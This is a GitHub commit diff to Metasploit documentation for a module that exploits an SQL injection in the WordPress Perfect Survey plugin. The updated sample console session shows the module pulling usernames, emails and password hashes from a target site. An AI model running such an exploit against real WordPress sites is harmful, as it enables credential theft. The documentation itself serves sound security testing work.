Skip to content

Commit 095bd94

Browse files
authored
docs: updated docs
1 parent ccf7e69 commit 095bd94

File tree

1 file changed

+11
-8
lines changed

1 file changed

+11
-8
lines changed

documentation/modules/auxiliary/scanner/http/wp_perfect_survey_sqli.md

Lines changed: 11 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -21,10 +21,6 @@ The specific vulnerable version can be found here: https://www.exploit-db.com/ap
2121

2222
## Options
2323

24-
### SHOW_FULL_RESPONSE
25-
If set to `true`, the module will print the entire JSON response received from the server when username and password hash extraction fails.
26-
Default is `false`.
27-
2824
## Scenarios
2925

3026
### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04
@@ -43,9 +39,16 @@ TARGETURI => /wordpress
4339
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit
4440
[*] Running module against 192.168.1.104
4541

42+
[*] Running automatic check ("set AutoCheck false" to disable)
43+
[+] The target is vulnerable.
4644
[*] Exploiting SQLi in Perfect Survey plugin...
47-
[+] Received a response from the server!
48-
[+] Extracted Username: aaryan
49-
[+] Extracted Password Hash: $P$BroxbUQTM0N32U7JeMmkXPJrxN9ErZ1
50-
[*] Auxiliary module execution completed
45+
[*] Extracting credential information
46+
47+
WordPress User Credentials
48+
==========================
49+
50+
Username Email Hash
51+
-------- ----- ----
52+
admin [email protected] $P$BwkQxR6HIt64UjYRG4D5GRKYdk.qcR1
53+
msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) >
5154
```

0 commit comments

Comments
 (0)